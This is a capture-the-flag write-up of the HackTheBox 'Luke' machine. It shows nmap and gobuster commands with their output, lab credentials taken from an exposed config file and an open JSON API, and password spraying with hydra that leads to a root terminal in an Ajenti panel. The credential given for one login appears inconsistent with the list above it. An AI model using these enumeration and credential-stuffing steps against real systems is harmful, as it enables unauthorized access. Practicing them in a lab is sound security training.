Luke - HackMD

###### tags: `hackthebox` `tutorials` `Luke` `CTF` `hacking` `medium` # Luke Luke was a simple box with no privilege escalation, there was alot of enumeration, so lets get started. ## Nmap nmap -sC -sV -oA nmap/luke 10.10.10.137 ``` # Nmap 7.70 scan initiated Mon May 27 05:07:59 2019 as: nmap -sC -sV -oA Luke 10.10.10.137 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 15:57 IST Nmap scan report for luke.io (10.10.10.137) Host is up (0.16s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.15.153 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit | No session download bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 6 | vsFTPd 3.0.3+ (ext.1) - secure, fast, stable |_End of status 22/tcp open SSH-2.0-OpenSSH_7.8 FreeBSD-20180909 80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3 |_http-title: Luke 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). 8000/tcp open http Ajenti http control panel |_http-title: Ajenti Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.18 seconds ``` ## FTP The FTP had anonymous login allowed, so logging in with credentials, ``` Username: anonymous Password: ``` we find a file *for_Chihiro.txt* inside *webapp*, which had the following contents: ``` Dear Chihiro !! As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created . Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! Derry ``` Nothing usefull here. ## Web run gobuster on all the ports (i.e 80,3000,8000), ``` gobuster -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.137/users -f -x php -s 200,204,301,302,307,403,401,500 ``` we find the following files. ``` 3000========================= http://10.10.10.137:3000/login/ (Status: 200) http://10.10.10.137:3000/users/ (Status: 200) http://10.10.10.137:3000/Login/ (Status: 200) http://10.10.10.137:3000/Users/ (Status: 200) 80========================= http://10.10.10.137/login.php (Status: 200) http://10.10.10.137/member/ (Status: 200) http://10.10.10.137/management/ (Status: 401) http://10.10.10.137/css/ (Status: 200) http://10.10.10.137/js/ (Status: 200) http://10.10.10.137/vendor/ (Status: 200) http://10.10.10.137/config.php (Status: 200) 8000========================= ``` Inside config.php on port 80, we creds ``` $dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error) ``` we dont know yet where these go, so continue the enumeration. ### Port 3000 On port 3000, we found a json webapp, and it inside it a *login* (the webserver at 3000 is not case-sensitive thus Users and users or Login and login are same). Making a post request to http://10.10.10.137:3000/login with creds found. I used python for it. we get the auth token and then further exploring the users as authenticated we get a list of users. ``` [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}] ``` And if we explore http://10.10.10.137:3000/users/**username** we get their respective passwords (I used Burp-Intruder for this). We getting the following data in-total. ``` Admin:WX5b7)>/rp$U)FW Derry:rZ86wwLvx7jUxtch Yuri:bet@tester87 Dory:5y:!xa=ybfe)/QD root:KpMasng6S5EtTy9Z ``` ### Port 80 After trying the password (i used hydra to try them all at login) at all logins found, we find that the http-auth at http://10.10.10.137/management/ has the creds ``` Derry:!xa=ybfe)/QD ``` Inside we are found the list of files, and inside config.json we find the creds to *Ajenti Login* at port 8000 ``` root:KpMasng6S5EtTy9Z ``` ## Root Shell Inside we get nice interface, we find terminal gui that has root privileges leading us to get root shell.